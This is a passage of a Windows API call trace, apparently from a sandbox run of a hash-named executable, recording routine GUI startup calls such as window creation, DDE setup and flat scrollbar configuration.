(in: hInstance=0x400000, uID=0xff48, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0075.678] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6cb60000 [0075.679] GetProcAddress (hModule=0x6cb60000, lpProcName="InitializeFlatSB") returned 0x6cb8ecf0 [0075.679] GetProcAddress (hModule=0x6cb60000, lpProcName="UninitializeFlatSB") returned 0x6cb8ef90 [0075.679] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_GetScrollProp") returned 0x6cb8bf70 [0075.679] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_SetScrollProp") returned 0x6cb8e6f0 [0075.679] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cb8bd70 [0075.679] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cb8ea50 [0075.680] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_GetScrollRange") returned 0x6cb8c0e0 [0075.680] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cb8be20 [0075.680] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_GetScrollPos") returned 0x6cb8bf10 [0075.680] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_SetScrollPos") returned 0x6cb8e660 [0075.680] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cb8e590 [0075.680] GetProcAddress (hModule=0x6cb60000, lpProcName="FlatSB_SetScrollRange") returned 0x6cb8e960 [0075.681] GetModuleHandleA (lpModuleName="User32.dll") returned 0x74790000 [0075.681] GetProcAddress (hModule=0x74790000, lpProcName="SetLayeredWindowAttributes") returned 0x747ccbc0 [0075.681] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc128 [0075.681] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75160000 [0075.681] GetProcAddress (hModule=0x75160000, lpProcName="CoCreateInstanceEx") returned 0x75575bc0 [0075.681] GetProcAddress (hModule=0x75160000, lpProcName="CoInitializeEx") returned 0x755088d0 [0075.682] GetProcAddress (hModule=0x75160000, lpProcName="CoAddRefServerProcess") returned 0x75580d30 [0075.682] GetProcAddress (hModule=0x75160000, lpProcName="CoReleaseServerProcess") returned 0x75583950 [0075.682] GetProcAddress (hModule=0x75160000, lpProcName="CoResumeClassObjects") returned 0x755898c0 [0075.682] GetProcAddress (hModule=0x75160000, lpProcName="CoSuspendClassObjects") returned 0x754f2d80 [0075.682] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc1df [0075.684] DdeInitializeA (in: pidInst=0x2281fb0, pfnCallback=0x463c40, afCmd=0x0, ulRes=0x0 | out: pidInst=0x2281fb0) returned 0x0 [0075.696] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19fdf8, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 0x62 [0075.696] DdeCreateStringHandleA (idInst=0x1000080, psz="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd", iCodePage=1004) returned 0xc000 [0075.696] DdeNameService (idInst=0x1000080, hsz1=0xc000, hsz2=0x0, afCmd=0x1) returned 0x1 [0075.701] CoInitialize (pvReserved=0x0) returned 0x0 [0075.707] GetCurrentThreadId () returned 0xab0 [0075.707] ResetEvent (hEvent=0x188) returned 1 [0075.707] GetCurrentThreadId () returned 0xab0 [0075.707] GetCurrentThreadId () returned 0xab0 [0075.707] GetCurrentThreadId () returned 0xab0 [0075.708] ResetEvent (hEvent=0x188) returned 1 [0075.708] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fd4c, fWinIni=0x0 | out: pvParam=0x19fd4c) returned 1 [0075.708] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fd4c, fWinIni=0x0 | out: pvParam=0x19fd4c) returned 1 [0075.708] GetSystemMetrics (nIndex=49) returned 16 [0075.708] GetSystemMetrics (nIndex=50) returned 16 [0075.708] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fd90, fWinIni=0x0 | out: pvParam=0x19fd90) returned 1 [0075.709] IsWindowVisible (hWnd=0x501e8) returned 0 [0075.709] GetCurrentThreadId () returned 0xab0 [0075.709] VirtualQuery (in: lpAddress=0x4660ac, lpBuffer=0x19fc70, dwLength=0x1c | out: lpBuffer=0x19fc70*(BaseAddress=0x466000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0075.709] FindResourceA (hModule=0x400000, lpName="TForm1", lpType=0xa) returned 0x477cb0 [0075.709] FindResourceA (hModule=0x400000, lpName="TForm1", lpType=0xa) returned 0x477cb0 [0075.709] LoadResource (hModule=0x400000, hResInfo=0x477cb0) returned 0x597f1c [0075.709] SizeofResource (hModule=0x400000, hResInfo=0x477cb0) returned 0x101 [0075.709] LockResource (hResData=0x597f1c) returned 0x597f1c [0075.709] GetCurrentThreadId () returned 0xab0 [0075.709] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fa14, fWinIni=0x0 | out: pvParam=0x19fa14) returned 1 [0075.709] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fa14, fWinIni=0x0 | out: pvParam=0x19fa14) returned 1 [0075.709] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fa14, fWinIni=0x0 | out: pvParam=0x19fa14) returned 1 [0075.709] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fa14, fWinIni=0x0 | out: pvParam=0x19fa14) returned 1 [0075.710] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0075.710] GetClassInfoA (in: hInstance=0x400000, lpClassName="TForm1", lpWndClass=0x19fa48 | out: lpWndClass=0x19fa48) returned 0 [0075.752] RegisterClassA (lpWndClass=0x19fa94) returned 0xc1e0 [0075.752] CreateWindowExA (dwExStyle=0x10000, lpClassName="TForm1", lpWindowName="Form1", dwStyle=0x6cf0000, X=192, Y=124, nWidth=1160, nHeight=600, hWndParent=0x501e8, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x701ec [0075.752] SetWindowLongA (hWnd=0x701ec, nIndex=-4, dwNewLong=34607061) returned 4472148 [0075.753] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.753] SetPropA (hWnd=0x701ec, lpString=0xc0ab, hData=0x2282180) returned 1 [0075.753] SetPropA (hWnd=0x701ec, lpString=0xc0ac, hData=0x2282180) returned 1 [0075.753] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x24, wParam=0x0, lParam=0x19f494) returned 0x0 [0075.753] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x81, wParam=0x0, lParam=0x19f488) returned 0x1 [0075.753] SetMenu (hWnd=0x701ec, hMenu=0x0) returned 1 [0075.754] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x46, wParam=0x0, lParam=0x19f074) returned 0x0 [0075.755] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x83, wParam=0x1, lParam=0x19f04c) returned 0x0 [0075.755] InflateRect (in: lprc=0x19f04c, dx=0, dy=0 | out: lprc=0x19f04c) returned 1 [0075.756] IsIconic (hWnd=0x701ec) returned 0 [0075.756] GetWindowRect (in: hWnd=0x701ec, lpRect=0x19ecac | out: lpRect=0x19ecac) returned 1 [0075.756] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.756] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x47, wParam=0x0, lParam=0x19f074) returned 0x0 [0075.756] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x3, wParam=0x0, lParam=0x9b00c8) returned 0x0 [0075.756] IsIconic (hWnd=0x701ec) returned 0 [0075.756] GetWindowRect (in: hWnd=0x701ec, lpRect=0x19e6d8 | out: lpRect=0x19e6d8) returned 1 [0075.756] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] IsIconic (hWnd=0x701ec) returned 0 [0075.757] GetWindowRect (in: hWnd=0x701ec, lpRect=0x19e6b4 | out: lpRect=0x19e6b4) returned 1 [0075.757] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x5, wParam=0x0, lParam=0x2310478) returned 0x0 [0075.757] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19e6cc, fWinIni=0x0 | out: pvParam=0x19e6cc) returned 1 [0075.757] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] IsIconic (hWnd=0x701ec) returned 0 [0075.757] GetClientRect (in: hWnd=0x701ec, lpRect=0x19e6bc | out: lpRect=0x19e6bc) returned 1 [0075.757] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] IsIconic (hWnd=0x701ec) returned 0 [0075.757] GetClientRect (in: hWnd=0x701ec, lpRect=0x19e6bc | out: lpRect=0x19e6bc) returned 1 [0075.757] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] IsIconic (hWnd=0x701ec) returned 0 [0075.757] GetClientRect (in: hWnd=0x701ec, lpRect=0x19e6a0 | out: lpRect=0x19e6a0) returned 1 [0075.757] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0075.757] IsIconic (hWnd=0x701ec) returned 0 [0075.757] GetClientRect (in: hWnd=0x701ec, lpRect=0x19e6a0 | out: lpRect=0x19e6a0) returned 1 [0075.758] FlatSB_SetScrollProp (param_1=0x701ec, index=0x100, newValue=0x0, param_4=1) returned 0 [0075.759] GetSysColor (nIndex=20) returned 0xffffff [0075.759] FlatSB_SetScrollProp (param_1=0x701ec, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0075.759] FlatSB_SetScrollInfo (param_1=0x701ec, code=1, psi=0x19e6d4, fRedraw=1) returned 0 [0077.032] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0077.032] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0077.032] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0077.038] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.038] IsIconic (hWnd=0x701ec) returned 0 [0077.038] GetClientRect (in: hWnd=0x701ec, lpRect=0x19e6a0 | out: lpRect=0x19e6a0) returned 1 [0077.038] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.038] IsIconic (hWnd=0x701ec) returned 0 [0077.038] GetClientRect (in: hWnd=0x701ec, lpRect=0x19e6a0 | out: lpRect=0x19e6a0) returned 1 [0077.039] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.039] IsIconic (hWnd=0x701ec) returned 0 [0077.039] GetClientRect (in: hWnd=0x701ec, lpRect=0x19e6a0 | out: lpRect=0x19e6a0) returned 1 [0077.039] FlatSB_SetScrollProp (param_1=0x701ec, index=0x200, newValue=0x0, param_4=1) returned 0 [0077.039] GetSysColor (nIndex=20) returned 0xffffff [0077.039] FlatSB_SetScrollProp (param_1=0x701ec, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0077.039] FlatSB_SetScrollInfo (param_1=0x701ec, code=0, psi=0x19e6d4, fRedraw=1) returned 0 [0077.041] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.041] IsIconic (hWnd=0x701ec) returned 0 [0077.041] GetClientRect (in: hWnd=0x701ec, lpRect=0x19e6a0 | out: lpRect=0x19e6a0) returned 1 [0077.043] GetSystemMenu (hWnd=0x701ec, bRevert=0) returned 0x8017d [0077.045] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x83, wParam=0x0, lParam=0x19f474) returned 0x0 [0077.045] InflateRect (in: lprc=0x19f474, dx=0, dy=0 | out: lprc=0x19f474) returned 1 [0077.045] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x1, wParam=0x0, lParam=0x19f488) returned 0x0 [0077.046] GetWindowLongA (hWnd=0x701ec, nIndex=-20) returned 65792 [0077.046] SetWindowLongA (hWnd=0x701ec, nIndex=-20, dwNewLong=65792) returned 65792 [0077.046] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x7c, wParam=0xffffffec, lParam=0x19f8dc) returned 0x0 [0077.047] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x7d, wParam=0xffffffec, lParam=0x19f8dc) returned 0x0 [0077.048] RedrawWindow (hWnd=0x701ec, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x485) returned 1 [0077.048] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.048] IsIconic (hWnd=0x701ec) returned 0 [0077.048] GetWindowRect (in: hWnd=0x701ec, lpRect=0x19f9dc | out: lpRect=0x19f9dc) returned 1 [0077.048] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.048] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3 [0077.053] CreateFontIndirectA (lplf=0x19f9dc) returned 0x3d0a06d0 [0077.053] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x30, wParam=0x3d0a06d0, lParam=0x1) returned 0x0 [0077.054] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.054] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.054] IsIconic (hWnd=0x701ec) returned 0 [0077.054] GetClientRect (in: hWnd=0x701ec, lpRect=0x19faa8 | out: lpRect=0x19faa8) returned 1 [0077.054] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.054] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.054] IsIconic (hWnd=0x701ec) returned 0 [0077.054] GetClientRect (in: hWnd=0x701ec, lpRect=0x19faa8 | out: lpRect=0x19faa8) returned 1 [0077.054] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.054] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.054] IsIconic (hWnd=0x701ec) returned 0 [0077.054] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa8c | out: lpRect=0x19fa8c) returned 1 [0077.054] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.054] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.054] IsIconic (hWnd=0x701ec) returned 0 [0077.054] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa8c | out: lpRect=0x19fa8c) returned 1 [0077.054] FlatSB_SetScrollProp (param_1=0x701ec, index=0x100, newValue=0x0, param_4=0) returned 0 [0077.054] GetSysColor (nIndex=20) returned 0xffffff [0077.054] FlatSB_SetScrollProp (param_1=0x701ec, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0077.054] FlatSB_SetScrollInfo (param_1=0x701ec, code=1, psi=0x19fac0, fRedraw=1) returned 0 [0077.058] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.058] IsIconic (hWnd=0x701ec) returned 0 [0077.058] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa8c | out: lpRect=0x19fa8c) returned 1 [0077.058] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.058] IsIconic (hWnd=0x701ec) returned 0 [0077.058] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa8c | out: lpRect=0x19fa8c) returned 1 [0077.058] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.058] IsIconic (hWnd=0x701ec) returned 0 [0077.058] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa8c | out: lpRect=0x19fa8c) returned 1 [0077.058] FlatSB_SetScrollProp (param_1=0x701ec, index=0x200, newValue=0x0, param_4=0) returned 0 [0077.058] GetSysColor (nIndex=20) returned 0xffffff [0077.058] FlatSB_SetScrollProp (param_1=0x701ec, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0077.058] FlatSB_SetScrollInfo (param_1=0x701ec, code=0, psi=0x19fac0, fRedraw=1) returned 0 [0077.060] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.060] IsIconic (hWnd=0x701ec) returned 0 [0077.060] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa8c | out: lpRect=0x19fa8c) returned 1 [0077.060] SendMessageA (hWnd=0x701ec, Msg=0x80, wParam=0x1, lParam=0xb0141) returned 0x0 [0077.060] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x80, wParam=0x1, lParam=0xb0141) returned 0x0 [0077.067] SetPropA (hWnd=0x701ec, lpString=0xc0ab, hData=0x2282180) returned 1 [0077.067] SetPropA (hWnd=0x701ec, lpString=0xc0ac, hData=0x2282180) returned 1 [0077.067] GetDC (hWnd=0x701ec) returned 0x401018d [0077.067] MoveToEx (in: hdc=0x401018d, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0077.068] SelectObject (hdc=0x401018d, h=0x3d0a06d0) returned 0x18a0048 [0077.068] GetSysColor (nIndex=8) returned 0x0 [0077.068] SetTextColor (hdc=0x401018d, color=0x0) returned 0x0 [0077.068] GetTextExtentPoint32A (in: hdc=0x401018d, lpString="0", c=1, psizl=0x19fb8c | out: psizl=0x19fb8c) returned 1 [0077.073] IsIconic (hWnd=0x701ec) returned 0 [0077.073] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fb94 | out: lpRect=0x19fb94) returned 1 [0077.073] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.073] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.073] IsIconic (hWnd=0x701ec) returned 0 [0077.073] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fab8 | out: lpRect=0x19fab8) returned 1 [0077.073] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.073] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.073] IsIconic (hWnd=0x701ec) returned 0 [0077.073] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fab8 | out: lpRect=0x19fab8) returned 1 [0077.073] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.074] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.074] IsIconic (hWnd=0x701ec) returned 0 [0077.074] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.074] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.074] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.074] IsIconic (hWnd=0x701ec) returned 0 [0077.074] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.074] FlatSB_SetScrollProp (param_1=0x701ec, index=0x100, newValue=0x0, param_4=0) returned 0 [0077.074] GetSysColor (nIndex=20) returned 0xffffff [0077.074] FlatSB_SetScrollProp (param_1=0x701ec, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0077.074] FlatSB_SetScrollInfo (param_1=0x701ec, code=1, psi=0x19fad0, fRedraw=1) returned 0 [0077.076] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xc021b [0077.076] SelectObject (hdc=0x401018d, h=0x1b00017) returned 0x1b00017 [0077.076] SelectObject (hdc=0x401018d, h=0x1900015) returned 0x1900010 [0077.076] SelectObject (hdc=0x401018d, h=0x18a0048) returned 0x3d0a06d0 [0077.076] GetCurrentPositionEx (in: hdc=0x401018d, lppt=0x19ee2c | out: lppt=0x19ee2c) returned 1 [0077.076] ReleaseDC (hWnd=0x701ec, hDC=0x401018d) returned 1 [0077.078] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.078] IsIconic (hWnd=0x701ec) returned 0 [0077.078] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.078] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.078] IsIconic (hWnd=0x701ec) returned 0 [0077.078] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.078] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.078] IsIconic (hWnd=0x701ec) returned 0 [0077.078] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.078] FlatSB_SetScrollProp (param_1=0x701ec, index=0x200, newValue=0x0, param_4=0) returned 0 [0077.078] GetSysColor (nIndex=20) returned 0xffffff [0077.078] FlatSB_SetScrollProp (param_1=0x701ec, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0077.079] FlatSB_SetScrollInfo (param_1=0x701ec, code=0, psi=0x19fad0, fRedraw=1) returned 0 [0077.080] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.081] IsIconic (hWnd=0x701ec) returned 0 [0077.081] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.081] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.081] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.081] IsIconic (hWnd=0x701ec) returned 0 [0077.081] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fab8 | out: lpRect=0x19fab8) returned 1 [0077.081] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.081] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.081] IsIconic (hWnd=0x701ec) returned 0 [0077.081] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fab8 | out: lpRect=0x19fab8) returned 1 [0077.081] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.081] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.081] IsIconic (hWnd=0x701ec) returned 0 [0077.081] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.081] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.081] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.081] IsIconic (hWnd=0x701ec) returned 0 [0077.081] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.081] FlatSB_SetScrollProp (param_1=0x701ec, index=0x100, newValue=0x0, param_4=0) returned 0 [0077.081] GetSysColor (nIndex=20) returned 0xffffff [0077.081] FlatSB_SetScrollProp (param_1=0x701ec, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0077.081] FlatSB_SetScrollInfo (param_1=0x701ec, code=1, psi=0x19fad0, fRedraw=1) returned 0 [0077.085] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.085] IsIconic (hWnd=0x701ec) returned 0 [0077.085] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.085] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.085] IsIconic (hWnd=0x701ec) returned 0 [0077.085] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.085] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.085] IsIconic (hWnd=0x701ec) returned 0 [0077.085] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.085] FlatSB_SetScrollProp (param_1=0x701ec, index=0x200, newValue=0x0, param_4=0) returned 0 [0077.085] GetSysColor (nIndex=20) returned 0xffffff [0077.085] FlatSB_SetScrollProp (param_1=0x701ec, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0077.085] FlatSB_SetScrollInfo (param_1=0x701ec, code=0, psi=0x19fad0, fRedraw=1) returned 0 [0077.087] GetWindowLongA (hWnd=0x701ec, nIndex=-16) returned 114229248 [0077.087] IsIconic (hWnd=0x701ec) returned 0 [0077.087] GetClientRect (in: hWnd=0x701ec, lpRect=0x19fa9c | out: lpRect=0x19fa9c) returned 1 [0077.087] GetCurrentThreadId () returned 0xab0 [0077.087] GetCurrentThreadId () returned 0xab0 [0077.087] GetCurrentThreadId () returned 0xab0 [0077.087] GetCurrentThreadId () returned 0xab0 [0077.087] GetCurrentThreadId () returned 0xab0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] FreeResource (hResData=0x597f1c) returned 0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] GetCurrentThreadId () returned 0xab0 [0077.088] SetEvent (hEvent=0x18c) returned 1 [0077.088] SetEvent (hEvent=0x188) returned 1 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.088] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.089] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 